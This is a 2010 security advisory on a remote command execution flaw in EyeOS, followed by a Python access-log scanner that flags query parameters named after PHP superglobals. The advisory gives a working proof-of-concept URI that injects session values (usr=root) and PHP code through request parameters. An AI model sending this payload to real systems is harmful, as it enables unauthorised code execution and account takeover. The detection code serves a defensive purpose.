EyeOS Session Remote Command Execution Vulnerability


An exploit is not required.

The following proof of concept URI is available:

http://www.example.com/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION[usr]=root&_SESSION[apps][eyeOptions.eyeapp][wrapup]=phpinfo();
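
A defensive check for the request pattern in the URI above, as an added example that is not part of the original advisory: it scans web access-log lines for query parameters whose names are PHP superglobals such as `_SESSION`. It generalizes from `_SESSION` to the other superglobal names; the function names, log format (combined), IP addresses and log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# PHP superglobal names that a client has no reason to send as parameter names.
SUPERGLOBALS = {"_SESSION", "_SERVER", "_ENV", "_FILES", "_COOKIE",
                "_GET", "_POST", "_REQUEST", "GLOBALS"}

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def base_name(param):
    """Return the parameter name without its PHP array suffix, e.g. '_SESSION[usr]' -> '_SESSION'."""
    return param.split("[", 1)[0].strip()


def suspicious_params(target):
    """List the query parameters of a request target whose base name is a superglobal."""
    query = urlsplit(target).query
    # parse_qsl URL-decodes names, so %5FSESSION%5Busr%5D is caught as well.
    return [name for name, _value in parse_qsl(query, keep_blank_values=True)
            if base_name(name) in SUPERGLOBALS]


def scan(lines):
    """Yield (line_number, [parameter names]) for each log line carrying such parameters."""
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        hits = suspicious_params(match.group("target"))
        if hits:
            yield number, hits


# Constructed sample log lines; line 2 carries the query string from the URI above.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp HTTP/1.1" 200 5120',
    '192.0.2.77 - - [01/Jan/2010:10:00:05 +0000] "GET /desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION[usr]=root&_SESSION[apps][eyeOptions.eyeapp][wrapup]=phpinfo(); HTTP/1.1" 200 48211',
    '192.0.2.77 - - [01/Jan/2010:10:00:09 +0000] "GET /desktop.php?%5FSESSION%5Busr%5D=root HTTP/1.1" 200 5120',
    '192.0.2.10 - - [01/Jan/2010:10:00:12 +0000] "GET /index.php?session=abc&my_SESSION=1 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print(f"line {number}: superglobal-named parameters {hits}")
```

The same name check can be applied to POST bodies and cookies at a reverse proxy or WAF, where matching requests can be rejected rather than only logged.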


 

Copyright 2010, SecurityFocus